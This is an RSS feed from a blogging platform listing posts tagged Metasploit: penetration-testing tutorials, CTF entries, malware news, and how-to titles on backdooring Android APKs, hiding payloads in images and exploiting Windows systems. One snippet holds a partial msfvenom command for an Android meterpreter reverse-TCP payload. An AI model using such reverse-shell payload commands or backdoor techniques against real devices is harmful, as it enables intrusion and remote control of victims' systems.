<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[RSS Feed]]></title><description><![CDATA[RSS Feed]]></description><link>http://direct.ecency.com</link><image><url>http://direct.ecency.com/logo512.png</url><title>RSS Feed</title><link>http://direct.ecency.com</link></image><generator>RSS for Node</generator><lastBuildDate>Tue, 21 Apr 2026 06:48:16 GMT</lastBuildDate><atom:link href="http://direct.ecency.com/created/metasploit/rss.xml" rel="self" type="application/rss+xml"/><item><title><![CDATA[como hacer el bien con metasploit?]]></title><description><![CDATA[Metasploit es una herramienta de prueba de penetración y evaluación de seguridad que se utiliza para identificar vulnerabilidades en sistemas y redes. Aunque puede tener usos legítimos y éticos, es importante]]></description><link>http://direct.ecency.com/metasploit/@makecoinfree/como-hacer-el-bien-con</link><guid isPermaLink="true">http://direct.ecency.com/metasploit/@makecoinfree/como-hacer-el-bien-con</guid><category><![CDATA[metasploit]]></category><dc:creator><![CDATA[makecoinfree]]></dc:creator><pubDate>Sun, 18 Jun 2023 12:43:21 GMT</pubDate><enclosure url="https://images.ecency.com/p/2FFvzA2zeqoVPgRCnRzbu6rj6tCWHWVCA9ZaKB4Zps11CN28B87uagzkwkAgi4zs2vZgBqBHRaAHrjimeErxcdBxaNeTatyrjYeMZE7zX7zAbS2LARH8hGaXXm6R4?format=match&amp;mode=fit" length="0" type="false"/></item><item><title><![CDATA[Competing in A Hacking Competition -- Metasploit CTF!]]></title><description><![CDATA[Today and tomorrow I'm competing in the Metasploit Community CTF -- a hacking competition! What is a CTF? A CTF (Capture The Flag) hacking competition is one where attackers try to break into systems and]]></description><link>http://direct.ecency.com/hacking/@shredz7/competing-in-a-hacking-competition-metasploit-ctf</link><guid isPermaLink="true">http://direct.ecency.com/hacking/@shredz7/competing-in-a-hacking-competition-metasploit-ctf</guid><category><![CDATA[hacking]]></category><dc:creator><![CDATA[shredz7]]></dc:creator><pubDate>Sat, 01 Dec 2018 00:09:39 GMT</pubDate><enclosure url="https://images.ecency.com/p/C3TZR1g81UNaPs7vzNXHueW5ZM76DSHWEY7onmfLxcK2iP5PxNrGqdpvGuQWBcNdrBgM2C1skT7vqy1wgGBhYUsmiWGbWefbXB735CiZVan2ekbTUBeguS6?format=match&amp;mode=fit" length="0" type="false"/></item><item><title><![CDATA[Backdoor apk - Android backdoor]]></title><description><![CDATA[Backdoor apk Android backdoor Screenshots Hunter's comment Open source linux tool for simplifies the process of adding a backdoor to any Android APK file. Its use Metasploit framework for backdoor in apk.]]></description><link>http://direct.ecency.com/steemhunt/@spyder896/backdoor-apk-android-backdoor</link><guid isPermaLink="true">http://direct.ecency.com/steemhunt/@spyder896/backdoor-apk-android-backdoor</guid><category><![CDATA[steemhunt]]></category><dc:creator><![CDATA[spyder896]]></dc:creator><pubDate>Tue, 18 Sep 2018 15:48:06 GMT</pubDate><enclosure url="https://images.ecency.com/p/7258xSVeJbKmPTruw3bvBgohFbX4k8MUsxTzCCqqN9vKTXsrpi8KPrgiEGLnGE3Dds94YijqrjwSUo3RdhyYDD49rFA5fehFe7yWuy48Mm5XZcfwCWvVZBYKzLjfA8fLkKjaD9KqaDFzN?format=match&amp;mode=fit" length="0" type="false"/></item><item><title><![CDATA[Android backdoor - msfvenom-backdoor-android]]></title><description><![CDATA[Android backdoor msfvenom-backdoor-android Screenshots Hunter's comment Open source kali linux tool for creating back door in android. cmd: $msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.178.30]]></description><link>http://direct.ecency.com/steemhunt/@spyder896/android-backdoor-msfvenom-backdoor-android</link><guid isPermaLink="true">http://direct.ecency.com/steemhunt/@spyder896/android-backdoor-msfvenom-backdoor-android</guid><category><![CDATA[steemhunt]]></category><dc:creator><![CDATA[spyder896]]></dc:creator><pubDate>Tue, 18 Sep 2018 10:28:48 GMT</pubDate><enclosure url="https://images.ecency.com/p/EEEoA8oLaAxtL9zGNdxnTbnKytUb6u8CM6aSKRjJQEisGVhqcbW8Ex67Gp3Jm3hxnmL3cp1zt2mEEvTacBChWwcySDwHETJCTsZPbgAwfgNLG6XfHY4Z7Gq2YBifDUouoTou2HmwGqMEdt5GN1EVC?format=match&amp;mode=fit" length="0" type="false"/></item><item><title><![CDATA[Newly Discovered "GZipDe" Malware Installs Metasploit Backdoor]]></title><description><![CDATA[Security researchers from AlienVault have discovered a new malware named "GZipDe" which currently seems to be active within a new cyber-espionage campaign. The researchers discovered the malware]]></description><link>http://direct.ecency.com/gzipde/@twr/newlydiscoveredgzipdemalwareinstallsmetasploitbackdoor-st9lme5k1f</link><guid isPermaLink="true">http://direct.ecency.com/gzipde/@twr/newlydiscoveredgzipdemalwareinstallsmetasploitbackdoor-st9lme5k1f</guid><category><![CDATA[gzipde]]></category><dc:creator><![CDATA[twr]]></dc:creator><pubDate>Sun, 24 Jun 2018 15:00:39 GMT</pubDate><enclosure url="https://images.ecency.com/p/46aP2QbqUqBr4rFUo5GyYyWxdnuHExLUZnEzuw3AFi4sN7w4sjNh22FwQmu65pgo7xFYDAPNYnhauSdJXzfqGRerJ254?format=match&amp;mode=fit" length="0" type="false"/></item><item><title><![CDATA[How To Hide a Virus Payload in JPG Image -Undetectable Backdoor ✔]]></title><description><![CDATA[WE do not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law. there is another method using this script]]></description><link>http://direct.ecency.com/ethical/@bamkikovic/xh9wc0yf</link><guid isPermaLink="true">http://direct.ecency.com/ethical/@bamkikovic/xh9wc0yf</guid><category><![CDATA[ethical]]></category><dc:creator><![CDATA[bamkikovic]]></dc:creator><pubDate>Sat, 09 Jun 2018 03:51:09 GMT</pubDate><enclosure url="https://images.ecency.com/p/46aP2QbqUqBqwzwxM6L1P6uLNceBDDCM7cTa7bvw2PJKv7uAoqg2g3g79JuESwubFSj6AaZbmcmS9dR9zjkCUWDpCk33?format=match&amp;mode=fit" length="0" type="false"/></item><item><title><![CDATA[kali LinuxK Tools - TheFatRat Tool For Generate Backdoor with MsfVenom]]></title><description><![CDATA[TheFatRat a Massive Exploiting Tool Revealed An easy tool to generate backdoor and easy tool to post exploitation attack like browser attack,dll . This tool compiles a malware with popular payload and]]></description><link>http://direct.ecency.com/metasploit/@bamkikovic/1becwiwr</link><guid isPermaLink="true">http://direct.ecency.com/metasploit/@bamkikovic/1becwiwr</guid><category><![CDATA[metasploit]]></category><dc:creator><![CDATA[bamkikovic]]></dc:creator><pubDate>Fri, 08 Jun 2018 18:43:39 GMT</pubDate><enclosure url="https://images.ecency.com/p/46aP2QbqUqBqwzwxM6L1P6uLNceBDDCMDonkLn1mvCwrHDWHxBZfrXgQXK2XW4ybJWmmWoTAu3ojKo5vhu1D8SSGWcBr?format=match&amp;mode=fit" length="0" type="false"/></item><item><title><![CDATA[Kali Linux - Remote PC with FatRat_ Xerosploit & Metasploit]]></title><description><![CDATA[Xerosploit: FatRat: ▶️ DTube ▶️ IPFS]]></description><link>http://direct.ecency.com/kali/@prooftv/860ca0ab</link><guid isPermaLink="true">http://direct.ecency.com/kali/@prooftv/860ca0ab</guid><category><![CDATA[kali]]></category><dc:creator><![CDATA[prooftv]]></dc:creator><pubDate>Sun, 06 May 2018 06:33:42 GMT</pubDate><enclosure url="https://images.ecency.com/p/46aP2QbqUqBqwzwxM6L1P6uLNceBDDCMD9C8zdN4ptDmXhzJcvDfzwezz7gkPruz3nmnN1u7aakZSgQ3Qo13MM5EmStK?format=match&amp;mode=fit" length="0" type="false"/></item><item><title><![CDATA[How to Exploit Nearly Any Windows System Using CVE-2017-8759]]></title><description><![CDATA[The beauty of this exploit is that it applies to nearly every Windows system. This exploit embeds a command to connect the target system to a web server on our system. There, the command will get our payload]]></description><link>http://direct.ecency.com/exploit/@fortean/how-to-exploit-nearly-any-windows-system-using-cve-2017-8759</link><guid isPermaLink="true">http://direct.ecency.com/exploit/@fortean/how-to-exploit-nearly-any-windows-system-using-cve-2017-8759</guid><category><![CDATA[exploit]]></category><dc:creator><![CDATA[fortean]]></dc:creator><pubDate>Wed, 25 Apr 2018 19:20:09 GMT</pubDate><enclosure url="https://images.ecency.com/p/2gsjgna1uruvUuS7ndh9YqVwYGPLVszbFLwwpAYXYXczM7ebwLYsHYf6y3VrEma6Q8jdThjxagoAgJmh4VC6WgXSo2pNSHEofQc199nCmErd3WvTuY?format=match&amp;mode=fit" length="0" type="false"/></item><item><title><![CDATA[MS17-010 (SMB RCE) Metasploit Scanner Detection Module]]></title><description><![CDATA[This is an adaptation for Steemit of Zerosum0x0. if you want to have it in HTML format you can see it here. Update April 21, 2017 - There is an active pull request at Metasploit master which adds DoublePulsar]]></description><link>http://direct.ecency.com/metasploit/@securitynews/ms17-010-smb-rce-metasploit-scanner-detection-module</link><guid isPermaLink="true">http://direct.ecency.com/metasploit/@securitynews/ms17-010-smb-rce-metasploit-scanner-detection-module</guid><category><![CDATA[metasploit]]></category><dc:creator><![CDATA[securitynews]]></dc:creator><pubDate>Fri, 13 Apr 2018 02:35:51 GMT</pubDate></item><item><title><![CDATA[What is Metasploit Framework? How to Install? General Command and Concepts #1]]></title><description><![CDATA[What Will I Learn? What is Metasploit Framework? How to Install? General Command and Concepts Requirements Linux Operating System Metasploit Framework Difficulty Advanced What is Metasploit Framework?]]></description><link>http://direct.ecency.com/utopian-io/@sdtyldz/what-is-metasploit-framework-how-to-install-general-command-and-concepts-1</link><guid isPermaLink="true">http://direct.ecency.com/utopian-io/@sdtyldz/what-is-metasploit-framework-how-to-install-general-command-and-concepts-1</guid><category><![CDATA[utopian-io]]></category><dc:creator><![CDATA[sdtyldz]]></dc:creator><pubDate>Fri, 23 Feb 2018 02:42:54 GMT</pubDate><enclosure url="https://images.ecency.com/p/3W72119s5BjWMGm4Xa2MvD5AT2bJsSA8F9WeC71v1s1fKfGkK9mMKuc3LcvF4KigbWg9UsrpEPGLBqcJ7ZgPUxKkkHVvx4emNdWhajCC9Vk6hqNYJ9mEL6?format=match&amp;mode=fit" length="0" type="false"/></item><item><title><![CDATA[HACKING WITH METASPLOIT....how to hack windows xp with metasploit.{additional; using nmap to scan}]]></title><description><![CDATA[What Will I Learn? You will learn all about metasploit You will learn how to use metasploit to hack window xp and the vulnerabilities. You will learn how to use nmap scanner Requirements A running kali]]></description><link>http://direct.ecency.com/utopian-io/@jedine/hacking-with-metasploit-how-to-hack-windows-xp-with-metasploit-additional-using-nmap-to-scan</link><guid isPermaLink="true">http://direct.ecency.com/utopian-io/@jedine/hacking-with-metasploit-how-to-hack-windows-xp-with-metasploit-additional-using-nmap-to-scan</guid><category><![CDATA[utopian-io]]></category><dc:creator><![CDATA[jedine]]></dc:creator><pubDate>Sat, 03 Feb 2018 11:57:48 GMT</pubDate><enclosure url="https://images.ecency.com/p/S5Eokt4BcQdk7EHeT1aYjzebg2hC7hkthT45ePyBNfkqvuRgZDG3FoKhuuW1f5ovrbU9P74?format=match&amp;mode=fit" length="0" type="false"/></item><item><title><![CDATA[An intro for the Metasploit program]]></title><description><![CDATA[Details I prepared an intro for the project named Metasploit. I used the original logo of the Metasploit when preparing the intro. The program I use when creating the intro is Adobe After Effects CC 2014]]></description><link>http://direct.ecency.com/utopian-io/@shankstaicho/an-intro-for-the-metasploit-program</link><guid isPermaLink="true">http://direct.ecency.com/utopian-io/@shankstaicho/an-intro-for-the-metasploit-program</guid><category><![CDATA[utopian-io]]></category><dc:creator><![CDATA[shankstaicho]]></dc:creator><pubDate>Mon, 15 Jan 2018 11:55:33 GMT</pubDate><enclosure url="https://images.ecency.com/p/3W72119s5BjWMGm4Xa2MvD5AT2bJsSA8F9WeC71v1s1fKfGkK9mMKuc3LcvF4KigbWg9UsrpEPG8RwzBRzbEFxeX3sf9CeH1otwM4qxizTGx36gjJErRqG?format=match&amp;mode=fit" length="0" type="false"/></item><item><title><![CDATA[CARA INSTALL METASPLOT DI WINDOWS]]></title><description><![CDATA[Kali ini saya akan share cara pasangan metasploit di windows dengan simpel dan mudah ga perlu berbelit belit Mula-mula download Metasploit For Windows di laman web metasploit : Lepas dah download, cari]]></description><link>http://direct.ecency.com/steemit/@agungpujiono/cara-install-metasplot-di-windows</link><guid isPermaLink="true">http://direct.ecency.com/steemit/@agungpujiono/cara-install-metasplot-di-windows</guid><category><![CDATA[steemit]]></category><dc:creator><![CDATA[agungpujiono]]></dc:creator><pubDate>Fri, 12 Jan 2018 19:00:06 GMT</pubDate></item><item><title><![CDATA[BELAJAR HACKING DI WINDOWS #1 -PENGENALAN METASPLOIT]]></title><description><![CDATA[Kali ini saya akan meng share sedikit ilmu-ilmu saya di dunia hacking, kenapa saya sebut dunia karena ini adalah pengendalian hanyalah mepengandalian di dunia maya sedikit dari saya saya akan mengshare]]></description><link>http://direct.ecency.com/steemit/@agungpujiono/belajar-hacking-di-windows-1-pengenalan-metasploit</link><guid isPermaLink="true">http://direct.ecency.com/steemit/@agungpujiono/belajar-hacking-di-windows-1-pengenalan-metasploit</guid><category><![CDATA[steemit]]></category><dc:creator><![CDATA[agungpujiono]]></dc:creator><pubDate>Fri, 12 Jan 2018 18:34:54 GMT</pubDate></item><item><title><![CDATA[Is getting into HACKING difficult.]]></title><description><![CDATA[hacking =/= Crime. Hacking is more like a lifestyle. Anything can be hacked no matter if it is your fridge light or a multimillion company. But let us take the process of hacking a (pc) "personal]]></description><link>http://direct.ecency.com/security/@superuser-do/is-getting-into-hacking-difficult</link><guid isPermaLink="true">http://direct.ecency.com/security/@superuser-do/is-getting-into-hacking-difficult</guid><category><![CDATA[security]]></category><dc:creator><![CDATA[superuser-do]]></dc:creator><pubDate>Tue, 09 Jan 2018 23:18:06 GMT</pubDate><enclosure url="https://images.ecency.com/p/C3TZR1g81UNchGPKLQuxAL7oEwDJ42cT977qXjChaBRGtEAy92KrpcN2mayAJfPoU7EfrMb6h686Nq9LTzGJ7DkxcTsfEvdSNA5mVQ1yUogrioo3sARSoVG?format=match&amp;mode=fit" length="0" type="false"/></item><item><title><![CDATA[Tutorial: Metasploit environment set up (step by step guide)]]></title><description><![CDATA[Anyone reading this right now, I assume you know or atleast have an idea what metasploit is. If yes, let us quickly look at the tools we will need to set up a test environment. And if you have no idea,]]></description><link>http://direct.ecency.com/utopian-io/@fortune-inyang/tutorial-metasploit-environment-set-up-step-by-step-guide</link><guid isPermaLink="true">http://direct.ecency.com/utopian-io/@fortune-inyang/tutorial-metasploit-environment-set-up-step-by-step-guide</guid><category><![CDATA[utopian-io]]></category><dc:creator><![CDATA[fortune-inyang]]></dc:creator><pubDate>Tue, 09 Jan 2018 03:12:21 GMT</pubDate><enclosure url="https://images.ecency.com/p/3W72119s5BjWMGm4Xa2MvD5AT2bJsSA8F9WeC71v1s1fKfGkK9mMKuc3LcvF4KigbWg9UsrpEPG4b6XAf43MzwT2pZcPdvmuBoVaLxGzKTBiy4D6SCs3k2?format=match&amp;mode=fit" length="0" type="false"/></item><item><title><![CDATA[Metasploitable zum Austoben]]></title><description><![CDATA[Vielen Dank für Ihre Unterstützung: ▶️ DTube ▶️ IPFS]]></description><link>http://direct.ecency.com/dtube/@sempervideo/23hc8gl0</link><guid isPermaLink="true">http://direct.ecency.com/dtube/@sempervideo/23hc8gl0</guid><category><![CDATA[dtube]]></category><dc:creator><![CDATA[sempervideo]]></dc:creator><pubDate>Mon, 08 Jan 2018 05:03:48 GMT</pubDate><enclosure url="https://images.ecency.com/p/2YRZBi4FZVHefWK95n7kbpqRg6FYqwQxXZVtZN73fsDMaCsCJehj91Ho3WiEMyGRB8ZjGBmt4hyjbQAVuPx9WtEU8HXugoRS8Vk?format=match&amp;mode=fit" length="0" type="false"/></item><item><title><![CDATA[Metasploit Framework (Turkish Tutorial)]]></title><description><![CDATA[Metasploit Nedir ? Linux, Windows ve Mac-OS da çalışabilen ve içinde exploit, payload, auxiliary ve encoder gibi çeşitli kod dizileri olan bir Pentest aracıdır. Çeşitli sistemlerdeki zaafiyetleri sömürmek]]></description><link>http://direct.ecency.com/utopian-io/@truthism/metasploit-framework-turkish-tutorial</link><guid isPermaLink="true">http://direct.ecency.com/utopian-io/@truthism/metasploit-framework-turkish-tutorial</guid><category><![CDATA[utopian-io]]></category><dc:creator><![CDATA[truthism]]></dc:creator><pubDate>Sun, 07 Jan 2018 06:54:57 GMT</pubDate><enclosure url="https://images.ecency.com/p/2nhMph8Yo3jHkBpsTBxogXBH3jfnZuEH8E1tZGytNAgGbMtf4yZfZsVBGKKT7NNm2oDZjdeFk31yRooNEBwFEe9ZAu5XeRthVnfv37hQMU9MsBgEh5Rnwzfsto1Zc7eGs5mPjJToGV8d9ngtYWKTv1NBvoWD8sSbyNuLiwyccmw7Rfqz2uE9XZou8?format=match&amp;mode=fit" length="0" type="false"/></item><item><title><![CDATA[How to hack a remote computer using Metasploit? Exploit vulnerabilities Java CVE-2012-0507]]></title><description><![CDATA[**WARNING** this post is only for knowledge only, not the purpose to make you do not good. This post only teaches you how to keep your personal data, social media, etc. to be safe. Because if we know how]]></description><link>http://direct.ecency.com/hacking/@andravasko/how-to-hack-a-remote-computer-using-metasploit-exploit-vulnerabilities-java-cve-2012-0507-201814t18498250z</link><guid isPermaLink="true">http://direct.ecency.com/hacking/@andravasko/how-to-hack-a-remote-computer-using-metasploit-exploit-vulnerabilities-java-cve-2012-0507-201814t18498250z</guid><category><![CDATA[hacking]]></category><dc:creator><![CDATA[andravasko]]></dc:creator><pubDate>Thu, 04 Jan 2018 11:49:15 GMT</pubDate><enclosure url="https://images.ecency.com/p/o1AJ9qDyyJNSpZWhUgGYc3MngFqoAN392MWikWde9G3upjD8a?format=match&amp;mode=fit" length="0" type="false"/></item></channel></rss>